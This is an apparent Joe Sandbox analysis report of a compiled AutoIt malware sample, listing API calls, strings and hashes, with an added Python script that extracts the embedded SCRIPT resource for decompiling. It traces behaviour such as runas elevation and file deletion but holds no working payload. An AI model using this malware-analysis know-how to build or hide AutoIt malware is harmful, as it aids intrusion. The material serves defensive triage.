                        • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                      • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                        • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                        • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                        • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                        • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                        • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                        • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                        • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                        • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                        • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                        • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                        • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                        • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                        • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                      • String ID: This is a third-party compiled AutoIt script.$runas$%I
                      • API String ID: 529118366-2806069697
                      • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                      • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                      • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                      • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                      Control-flow Graph (node/edge dump omitted): function 004049A0 calls GetVersionExW on entry, then GetCurrentProcess and IsWow64Process (00404A93), GetNativeSystemInfo (00404AE3), FreeLibrary (00404AEF) and GetSystemInfo (00404B1F, 00404B2B); the 0043D76x to 0043D89x blocks are out-of-line paths that rejoin at 00404A93.
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004049CD
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                      • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                      • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                      • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                      • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                      • String ID:
                      • API String ID: 1986165174-0
                      • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                      • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                      • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                      • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                      Control-flow Graph (node/edge dump omitted): function 00404E89 calls CreateStreamOnHGlobal, then FindResourceExW (00404EA3); on success it continues out of line with LoadResource (0043D933), SizeofResource (0043D948) and LockResource (0043D95C), and every failure path returns through 00404EC0.
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                      • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                      • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                      • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                      • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                      • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                      • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
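The five calls listed for function 00404E89 (CreateStreamOnHGlobal, FindResourceExW with type 0000000A = RT_RCDATA and name SCRIPT, LoadResource, SizeofResource, LockResource) are how the AutoIt3 runtime inside this sample locates its compiled script payload. The script below is an analyst's example added here; it is not part of the Joe Sandbox report nor code from the sample. It walks a PE's resource directory by hand (no pefile dependency) and returns that RCDATA/SCRIPT blob so it can be handed to an AutoIt decompiler. build_sample_pe is a constructed test fixture: a minimal PE32 whose only section is .rsrc with such a resource, so the walker can be exercised offline; its payload bytes are arbitrary and carry no AutoIt semantics.

```python
"""Pull the RT_RCDATA/"SCRIPT" resource out of a compiled AutoIt3 PE.

Hand-written PE resource walker (no pefile dependency). The FindResourceExW
call in the report passes type 0xA (RT_RCDATA) and name "SCRIPT".
"""
import struct
import sys

RT_RCDATA = 10


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def _rva_to_off(sections, rva):
    """Map a virtual address to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA %#x lies outside every section" % rva)


def _dir_entries(pe, base, dir_off):
    """Yield (id_or_name, is_subdir, file_offset) for one IMAGE_RESOURCE_DIRECTORY.
    Named entries point (relative to the .rsrc base) at a length-prefixed UTF-16 string."""
    n_named, n_id = _u16(pe, dir_off + 12), _u16(pe, dir_off + 14)
    for i in range(n_named + n_id):
        e = dir_off + 16 + 8 * i
        name, off = _u32(pe, e), _u32(pe, e + 4)
        if name & 0x80000000:
            s = base + (name & 0x7FFFFFFF)
            key = pe[s + 2:s + 2 + 2 * _u16(pe, s)].decode("utf-16-le")
        else:
            key = name
        yield key, bool(off & 0x80000000), base + (off & 0x7FFFFFFF)


def find_script_resource(pe):
    """Return the bytes of RCDATA/"SCRIPT"/<first language>, or None if absent."""
    e_lfanew = _u32(pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec, opt_size = _u16(pe, coff + 2), _u16(pe, coff + 16)
    opt = coff + 20
    # Data directories start at +0x60 for PE32 (magic 0x10B), +0x70 for PE32+.
    dd = opt + (0x60 if _u16(pe, opt) == 0x10B else 0x70)
    rsrc_rva = _u32(pe, dd + 8 * 2)            # IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
    if rsrc_rva == 0:
        return None
    sections = []                               # (VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData)
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        sections.append((_u32(pe, s + 12), _u32(pe, s + 8), _u32(pe, s + 20), _u32(pe, s + 16)))
    base = _rva_to_off(sections, rsrc_rva)
    for rtype, t_dir, t_off in _dir_entries(pe, base, base):            # level 1: type
        if rtype != RT_RCDATA or not t_dir:
            continue
        for name, n_dir, n_off in _dir_entries(pe, base, t_off):        # level 2: name
            if name != "SCRIPT" or not n_dir:
                continue
            for _lang, l_dir, l_off in _dir_entries(pe, base, n_off):   # level 3: language
                if not l_dir:                   # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (RVA), Size
                    data_rva, size = _u32(pe, l_off), _u32(pe, l_off + 4)
                    start = _rva_to_off(sections, data_rva)
                    return pe[start:start + size]
    return None


def build_sample_pe(payload, name="SCRIPT"):
    """Constructed test input: a minimal PE32 whose only section is .rsrc holding
    RCDATA/<name>/0x409 = payload. Not a real AutoIt binary; payload is arbitrary bytes."""
    rsrc_rva = 0x1000
    sname = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    sname += b"\0" * (-len(sname) % 4)
    data_off = 88 + len(sname)                  # root(24) + type dir(24) + name dir(24) + data entry(16) + string
    rsrc = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 24)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", 0x80000000 | 88, 0x80000000 | 48)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0x409, 72)
    rsrc += struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0) + sname + payload
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)    # i386, 1 section, PE32 optional header
    dirs = [(0, 0)] * 16
    dirs[2] = (rsrc_rva, len(rsrc))
    opt = struct.pack("<H", 0x10B) + b"\0" * (0x60 - 2) + b"".join(struct.pack("<II", *d) for d in dirs)
    sec = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(rsrc), rsrc_rva, len(rsrc), 0x200, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + opt + sec
    return hdr + b"\0" * (0x200 - len(hdr)) + rsrc


if __name__ == "__main__":
    blob = find_script_resource(open(sys.argv[1], "rb").read())
    if blob is None:
        sys.exit("no RCDATA/SCRIPT resource: probably not a compiled AutoIt3 binary")
    open(sys.argv[1] + ".au3script.bin", "wb").write(blob)   # still compressed; feed it to a decompiler
    print("wrote %d bytes" % len(blob))
```

A non-None result from find_script_resource is a cheap triage check for compiled-AutoIt binaries, independent of the "This is a third-party compiled AutoIt script." string. The returned blob is the compressed script container, not readable source; it still has to go through an AutoIt decompiler before the script logic can be read.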
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: pbL$%I
                      • API String ID: 3964851224-1578263234
                      • Opcode ID: f39f8334b77e57f09a93afb6d734b6dfda5cd7ecc27434c235e41694184fbe06
                      • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                      • Opcode Fuzzy Hash: f39f8334b77e57f09a93afb6d734b6dfda5cd7ecc27434c235e41694184fbe06
                      • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                      • API String ID: 0-2838938394
                      • Opcode ID: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                      • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                      • Opcode Fuzzy Hash: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                      • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                      APIs
                      • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                      • FindClose.KERNEL32(00000000), ref: 0046448B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                      • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                      • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                      • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                      • timeGetTime.WINMM ref: 00410D16
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                      • Sleep.KERNEL32(0000000A), ref: 00410E61
                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                      • DestroyWindow.USER32 ref: 00410F06
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                      • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                      • TranslateMessage.USER32(?), ref: 00445C60
                      • DispatchMessageW.USER32(?), ref: 00445C6E
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                      • API String ID: 4212290369-1082885916
                      • Opcode ID: 1d56dc0301da9218f0dfd79e4aeca75a1c82d79ff43336c094143f62481f1745
                      • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                      • Opcode Fuzzy Hash: 1d56dc0301da9218f0dfd79e4aeca75a1c82d79ff43336c094143f62481f1745
                      • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLastwsprintf
                      • String ID:
                      • API String ID: 2587402804-0
                      • Opcode ID: 4bd4bf10f1c3810d56c3cb94e8b8786a7ae720bc94708982795d1ae5cc6f19ef
                      • Instruction ID: 46a9f3af92a05c54ffccb94bf3193eb247147a80b62d24dc45f124c2f02a5965
                      • Opcode Fuzzy Hash: 4bd4bf10f1c3810d56c3cb94e8b8786a7ae720bc94708982795d1ae5cc6f19ef
                      • Instruction Fuzzy Hash: 0CF13D21E5C3809EEB3557284C0CB76BBA15F526F8F4C079BE756CA1F2D7648804F262

                      Control-flow Graph (node/edge dump omitted): function 00469155 assembles its paths through the __wsplitpath/_wcscat helpers listed below and then either calls DeleteFileW (0046944B), or CopyFileW (00469505) followed by DeleteFileW on either outcome (0046951B or 0046952D), with a further DeleteFileW at 004694F4 on the 00469469 path.
                      APIs
                        • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                        • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                      • __wsplitpath.LIBCMT ref: 00469234
                        • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                      • _wcscpy.LIBCMT ref: 00469247
                      • _wcscat.LIBCMT ref: 0046925A
                      • __wsplitpath.LIBCMT ref: 0046927F
                      • _wcscat.LIBCMT ref: 00469295
                      • _wcscat.LIBCMT ref: 004692A8
                        • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                        • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                      • _wcscmp.LIBCMT ref: 004691EF
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                      • _wcsncpy.LIBCMT ref: 004694C5
                      • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 1500180987-0
                      • Opcode ID: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
                      • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                      • Opcode Fuzzy Hash: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
                      • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • RegisterClassExW.USER32(00000030), ref: 0040309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • LoadIconW.USER32(000000A9), ref: 004030F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                      • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                      • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                      • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • RegisterClassExW.USER32(00000030), ref: 0040309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • LoadIconW.USER32(000000A9), ref: 004030F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                      • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
